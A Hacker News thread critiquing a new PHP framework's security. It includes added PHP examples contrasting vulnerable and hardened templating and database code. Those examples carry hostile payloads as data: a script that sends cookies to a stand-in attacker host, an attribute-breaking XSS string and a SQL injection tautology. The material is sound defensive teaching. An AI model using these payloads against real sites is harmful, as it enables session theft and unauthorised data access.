
Show HN: Flubber – another PHP framework - madospace
http://flubber.co/
======
krapp
I think you may find people more receptive to something like this if it's
built as a Composer package.

One of the most important aspects of a PHP framework to me is the ease with
which you can add or swap out libraries - and being able to include things
with Composer and use its autoloading features would make a framework more
modular and easier to manage and extend in the future.

Having your own extension system is fine and perfectly valid, but a lot of
people have already invested in the existing package manager and PSR-0, and
will expect to be able to use it for their projects.

As far as the rest of it, I would mention the use of the deprecated (and
highly vulnerable) sql_* functions and the lack of xss protection in the
templates but I assume changes to those would be forthcoming.

I like the lack of abstraction and the built-in MVC, though I think people
used to Rails-style routers in other frameworks like Laravel might wind up a
bit put off.

~~~
madospace
Thanks for the feedback! Next in the development pipeline I have a few of these
issues. Basically this evolved out of a small project (read: failed). The next
version will include:
* Clean database layer
* Packaging
* Template engine
* XSS protection (thanks to you!)

I have to consider your thoughts on extensions; in any case, it's the second
priority.

~~~
krapp
I know from personal experience how nasty raw PHP templating can be, in a
sprawling codebase where no one ever considered that simply echoing variables
that came from the database or from request variables might be a bad idea.

It makes even a simple framework more complicated but people use frameworks to
not have to be bothered about that sort of thing.

You may want to take a look at this before proceeding:
[https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet](https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet)

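As an added example (not Flubber's code, and not from either commenter), the raw-echo template pattern described above next to an escaped version. The todo row is constructed; its title and tag fields hold the kind of strings a user could have submitted through a form or stored in the database, and `e()` is a hypothetical helper name, not something the framework provides.

```php
<?php
// Added example (not Flubber's code): echoing a value straight into a
// template versus escaping it for an HTML context.
declare(strict_types=1);

// Constructed row, as it might come back from the database or from $_POST.
// Both title and tag are attacker-controlled payloads.
$todo = [
    'id'    => 7,
    'title' => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'tag'   => 'urgent" onmouseover="alert(1)',
];

// Vulnerable: raw echo, as a "simple" PHP template tends to do.
// The title runs as script in the page; the tag closes the attribute and adds
// an event handler.
function renderRaw(array $todo): string
{
    ob_start();
    ?>
<li id="todo-<?= $todo['id'] ?>" data-tag="<?= $todo['tag'] ?>"><?= $todo['title'] ?></li>
<?php
    return ob_get_clean();
}

// Hardened: one escape helper (hypothetical name) used at every output point.
// ENT_QUOTES escapes both " and ', so the same helper is safe inside quoted
// attribute values as well as element content. ENT_SUBSTITUTE replaces invalid
// UTF-8 with U+FFFD instead of returning an empty string, which would otherwise
// silently blank the output and hide the problem.
function e($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderEscaped(array $todo): string
{
    ob_start();
    ?>
<li id="todo-<?= e($todo['id']) ?>" data-tag="<?= e($todo['tag']) ?>"><?= e($todo['title']) ?></li>
<?php
    return ob_get_clean();
}

echo "Raw (script tag and attribute break-out reach the browser):\n", renderRaw($todo);
echo "\nEscaped (the payload is inert text):\n", renderEscaped($todo);
```

`e()` covers HTML element content and quoted attribute values only; values placed into a JavaScript block, a URL, or CSS need the encoder for that context, and an unquoted attribute is not protected by this at all. The more robust fix is the one the author mentions next: a template engine that escapes by default, so the safety of a page does not depend on every `<?= ?>` remembering to call the helper.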
~~~
madospace
Definitely. Since it was all a personal requirement, it was designed like this. I
will start cleaning it up, and of course the cheat sheet will reduce a lot of my
research.

------
nahhh
I think you should discontinue this piece of crap. It even probably (depending
on whether you perform some sort of sanitization before passing the request) has
an SQL injection vulnerability in your "todo" app example. And it looks like a
piece of crap that no one would ever use.

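As an added example (not the project's code, and not something either commenter posted), the concatenated-query pattern nahhh is pointing at, beside the prepared-statement form that replaces the removed mysql_* functions krapp mentioned earlier in the thread. It uses PDO over an in-memory SQLite database with a constructed `todos` table so it runs without a MySQL server; the injection mechanics are the same with the MySQL driver.

```php
<?php
// Added example (not Flubber's code). PDO + in-memory SQLite so it runs offline;
// the table and rows are constructed for the demonstration.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE todos (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, title TEXT NOT NULL)');
$db->exec("INSERT INTO todos (owner, title) VALUES ('alice', 'buy milk'), ('bob', 'secret plan')");

// Vulnerable: the request value is concatenated into the SQL text. This is what
// code written against the old mysql_query() API usually did; the driver does
// not matter, the string building does.
function findTodosRaw(PDO $db, string $owner): array
{
    $sql = "SELECT id, owner, title FROM todos WHERE owner = '" . $owner . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is sent as a bound parameter and is never parsed as SQL,
// so quotes in it cannot change the statement's structure.
function findTodosSafe(PDO $db, string $owner): array
{
    $stmt = $db->prepare('SELECT id, owner, title FROM todos WHERE owner = :owner');
    $stmt->execute([':owner' => $owner]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input, e.g. the value of $_GET['owner'].
// The single quote closes the literal and the OR makes the WHERE clause a
// tautology, so the concatenated query returns every user's rows.
$payload = "alice' OR '1'='1";

echo "Concatenated query:\n";
print_r(findTodosRaw($db, $payload));

echo "\nPrepared statement (no owner is literally named that, so nothing matches):\n";
print_r(findTodosSafe($db, $payload));
```

Note that "sanitization before passing the request" is the wrong place to solve this: escaping is per-context and easy to miss, while binding parameters removes the problem for every query that uses it. With the MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the parameters are bound server-side rather than interpolated client-side.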
~~~
madospace
Sure thing! I would not discontinue this. But I can fix this; give me some
time until I get these things clear. Thanks for the feedback, though.

